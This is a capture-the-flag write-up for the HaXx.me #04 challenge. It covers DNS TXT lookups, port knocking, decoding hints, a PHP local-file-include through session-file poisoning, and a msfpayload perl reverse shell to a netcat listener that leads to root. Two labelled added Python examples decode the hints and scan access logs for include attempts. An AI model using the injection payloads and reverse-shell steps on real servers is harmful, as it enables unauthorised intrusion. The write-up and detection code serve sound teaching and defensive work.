
@flagitiouslogic’s

HaXx.me #04
haxlog
1) The Main Gateway

The game starts with the web page shown above. The clue asks me for a TXT record for 127.0.0.1.

dig @haxxme.intern0t.net -x 127.0.0.1 -t txt


Next, a TXT record for the theninja domain is asked for.
dig @haxxme.intern0t.net thninja -t txt

The Secret Ninja Code may be ASCII.


41 = A
65 = e
51 = NAK????
Maybe not.
Moving on, connecting to the root of the web server the page below is returned.

The HTML comments might be a hint, along with the web server reporting back as fake404.intern0t.net. The hint from the theninja TXT record stated: go to the default web page of the web server.
The page returned when requesting index.html from the root of the web server looks similar to the page returned for the root of the web server. One difference is that the server name returned is not fake404.intern0t.net. Checking the traffic in Fiddler2 shows the following.

Turns out that the page returned from the root of the web server is not a 404; it's also 721 bytes larger than an actual 404.
Scrolling to the bottom of the fake 404 page, the following HTML comment is shown.
<!--01011001 01101111 01110101 00100000 01101011 01101110 01101111
01110111 00101100 00100000 01101001 01100110 00100000 01111001
01101111 01110101 00100111 01110010 01100101 00100000 01110011
01110100 01110101 01100011 01101011 00100000 01101111 01101110
00100000 01110100 01101000 01100101 00100000 01101110 01110101
01101101 01100010 01100101 01110010 01110011 00101100 00100000
01110100 01110010 01111001 00100000 01101011 01101110 01101111
01100011 01101011 01101001 01101110 01100111 00100001-->
Converting from binary to ASCII, the above translates to:
“You know, if you're stuck on the numbers, try knocking!”

A simple nmap scan shows that ports 53 and 80 are open, with ports 1, 3306, and 31337 being filtered.
Could the ninja code be a port knocking sequence? Try running the knock client against the server.

After running the knock sequence, a rescan with nmap shows that port 31337 is now open.

2) The Ninja

Connecting to port 31337, the above page is returned.

Include /etc/ninja? A look at the source for this page may offer a deeper insight.
A quick check of the source shows the comment <!-- include ($input) // input is a registered global -->

Setting input to /etc/ninja

returns a page with the new Secret Ninja Code of


SW4gb3JkZXIgdG8gZW50ZXIgdGhlIGJhc2UsIE9uZSBtdXN0IHVzZSB0aGUgZm9sbG93aW5nIGNvZGU6IDEwMTAxLDExMDEwLDEwMTEx
This is base64 for the following:
In order to enter the base, One must use the following code: 10101,11010,10111
Running the knock client against the server using the new sequence of numbers.

A rescan with nmap shows that port 1 on the server is now open.

3) The Base

Connecting to the server on port 1, the above page is returned.


A WarGames reference mixed in with a TRON theme and ninja references throughout? OK, my hax0r cliché limit may have been hit. Anyway, the password is Joshua.
3) Border Control

Next, log in using the given credentials.


4) The Final Destination

The Final Destination page has a link to a tarball that contains the source for the baselogin.php (Border Control login) and controlroom.php (The Final Destination) pages.

A quick review shows that the Border Control login page (baselogin.php) uses guest and pass as hardcoded credentials, and when they are used the page redirects to controlroom.php.
Moving on to the controlroom.php page source, the following list of ASCII (in hex) is found in another HTML comment that appears to be a hint.

\x53\x65\x73\x73\x69\x6f\x6e\x20\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x3a\x20\x2f\x76\x61\x72\x2f\x6c\x69\x62\x2f\x70\x68\x70\x35\x2f
Dumping the hex in Tiny Hexer shows the following ASCII.
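The three hints in this challenge (the binary HTML comment on the fake 404 page, the base64 Secret Ninja Code from /etc/ninja, and the hex-escaped comment in controlroom.php) are all plain ASCII behind a different encoding. The following decoder is an added example and not part of the original writeup; the three encoded strings are copied from the pages above, while the `decode_hint` classifier and its helpers are this example's own code. It recognises whitespace-separated 8-bit groups, `\xNN` escape lists and base64, and strips whitespace first so that a string wrapped across lines (as the base64 and hex hints are on this page) still decodes.

```python
"""Decode the encoded hints from the HaXx.me #04 pages.

Added example: the three HINT strings are copied from the writeup;
the decoding functions are this example's own code.
"""
import base64
import re

# Binary HTML comment from the fake 404 page (copied from the writeup).
BINARY_HINT = """01011001 01101111 01110101 00100000 01101011 01101110 01101111
01110111 00101100 00100000 01101001 01100110 00100000 01111001
01101111 01110101 00100111 01110010 01100101 00100000 01110011
01110100 01110101 01100011 01101011 00100000 01101111 01101110
00100000 01110100 01101000 01100101 00100000 01101110 01110101
01101101 01100010 01100101 01110010 01110011 00101100 00100000
01110100 01110010 01111001 00100000 01101011 01101110 01101111
01100011 01101011 01101001 01101110 01100111 00100001"""

# Secret Ninja Code from /etc/ninja, wrapped across two lines as on the page.
BASE64_HINT = """SW4gb3JkZXIgdG8gZW50ZXIgdGhlIGJhc2UsIE9uZSBtdXN0IHVzZSB0aGUgZm9sbG93aW5nIG
NvZGU6IDEwMTAxLDExMDEwLDEwMTEx"""

# Hex-escaped HTML comment from controlroom.php.
HEX_HINT = (r"\x53\x65\x73\x73\x69\x6f\x6e\x20\x44\x69\x72\x65\x63\x74\x6f\x72"
            r"\x79\x3a\x20\x2f\x76\x61\x72\x2f\x6c\x69\x62\x2f\x70\x68\x70\x35\x2f")


def _compact(text: str) -> str:
    """Remove all whitespace, including line wraps inserted by the page layout."""
    return re.sub(r"\s+", "", text)


def decode_binary(text: str) -> str:
    """Turn a run of 8-bit binary groups into ASCII text."""
    bits = _compact(text)
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def decode_hex_escapes(text: str) -> str:
    r"""Turn a '\x53\x65...' escape list into ASCII text."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", _compact(text))
    return bytes(int(h, 16) for h in pairs).decode("ascii")


def decode_base64(text: str) -> str:
    """Decode base64 text, tolerating line wraps."""
    return base64.b64decode(_compact(text)).decode("ascii")


def decode_hint(text: str) -> str:
    """Guess which of the three encodings a hint uses and decode it.

    The binary check runs first because a binary string would also pass
    the base64 character-class check.
    """
    compact = _compact(text)
    if re.fullmatch(r"[01]+", compact) and len(compact) % 8 == 0:
        return decode_binary(text)
    if compact.startswith("\\x"):
        return decode_hex_escapes(text)
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact) and len(compact) % 4 == 0:
        return decode_base64(text)
    raise ValueError("unrecognised hint encoding")


if __name__ == "__main__":
    for hint in (BINARY_HINT, BASE64_HINT, HEX_HINT):
        print(decode_hint(hint))
```

Running the script prints the three decoded sentences in the order the writeup found them. The base64 hint decodes without padding because its plaintext length is a multiple of three.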

Next, the source shows that the user variable is included by the PHP code.

It would seem the page is vulnerable to a local file include, and the PHP session directory is /var/lib/php5/.

Grab the PHPSESSID and set the user variable to the session file as shown below.
Setting the PHP session password variable to <?php echo exec('whoami');?> using the baseindex.php page and then reloading the controlroom.php page with the user variable set to the session file shows the following info.

It would seem the web server is running as www-data.


Setting the PHP session password variable to <?php echo exec('which perl'); ?> using the baseindex.php page and then reloading the controlroom.php page with the user variable set to the session file shows the following info.

It would seem that perl is available. Using the following msfpayload command, a perl reverse shell can be built.
msfpayload php/reverse_perl LHOST=MYIP LPORT=2024 R
Then set up a netcat listener on an attacker-controlled machine.

After that, setting the PHP session password variable to the output of the msfpayload command wrapped in PHP tags using the baseindex.php page, and then reloading the controlroom.php page with the user variable set to the session file, gives shell access as www-data. A process list shown below divulges a netcat listener running as root. Well, that was easy.
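From the defender's side, the chain above (include of a user-supplied path, then include of the server's own session file) leaves a recognisable trail in the web server access log: parameter values that are absolute paths, that traverse with `../`, or that point at a `sess_` file in the PHP session directory. The scanner below is an added example and not part of the writeup. The page names, parameter names and the /var/lib/php5/ session directory are taken from the challenge; the IP addresses, timestamps and session id in the sample log are constructed, and the Apache combined-log layout is an assumption about how such a server would log.

```python
"""Flag local-file-include attempts in web server access logs.

Added example, not part of the original writeup. SAMPLE_LOG is
constructed: page and parameter names mirror the challenge, while IPs,
timestamps and the session id are made up.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2011:20:01:02 +0000] "GET /index.php?input=about.html HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2011:20:01:09 +0000] "GET /index.php?input=/etc/ninja HTTP/1.1" 200 801
10.0.0.5 - - [12/Mar/2011:20:02:31 +0000] "GET /controlroom.php?user=/var/lib/php5/sess_0123456789abcdef HTTP/1.1" 200 433
10.0.0.5 - - [12/Mar/2011:20:02:40 +0000] "GET /controlroom.php?user=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1337
10.0.0.9 - - [12/Mar/2011:20:03:00 +0000] "GET /controlroom.php?user=guest HTTP/1.1" 200 433
"""

# Apache/nginx combined log format (assumed layout for the constructed sample).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP session directory, as revealed by the hint in controlroom.php.
SESSION_DIR = "/var/lib/php5/"


def suspicious_reason(value: str):
    """Return why a parameter value looks like a file-include attempt, or None."""
    # parse_qsl already decodes once; decoding again catches double-encoded payloads.
    v = unquote(value)
    if "../" in v or "..\\" in v:
        return "path traversal"
    if v.startswith(SESSION_DIR + "sess_"):
        return "php session file include"
    if v.startswith("/"):
        return "absolute path"
    return None


def scan_log(text: str):
    """Scan access-log lines and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = suspicious_reason(value)
            if reason:
                findings.append({
                    "ip": m["ip"],
                    "time": m["time"],
                    "path": parts.path,
                    "param": name,
                    "value": unquote(value),
                    "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']!r}: {f['reason']}")
```

Only GET parameters appear in an access log; the session value that carried the PHP payload was submitted through the login form, so the poisoning step itself would need request-body or application logging to catch. The include of the session file is visible regardless, and on this server the fix is the usual one: never pass request input to include(), resolve pages through a fixed allowlist, and keep register_globals off.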

Nice! That’s root on the server.


Below is the content of the winning-key.txt file.

Next, dump the shellcode from the text file to a bin file and then use msfencode to quickly build an exe.

msfencode -e generic/none -a x86 -p windows -t exe -o final.exe < final.bin


Then load the exe into a debugger and search to find the first four bytes.
Use the debugger to set the OEP to the address of the start of the shellcode.

As the shellcode is all inside the text segment, the segment will need to be set to full access.

Set a breakpoint at the end of the shellcode.


Last step: run the shellcode in the debugger and reap the reward.

I cracked the HaXx.Me #04 challenge and I shouldn't just be proud, I should be proud like hell because it was the hardest of them all!
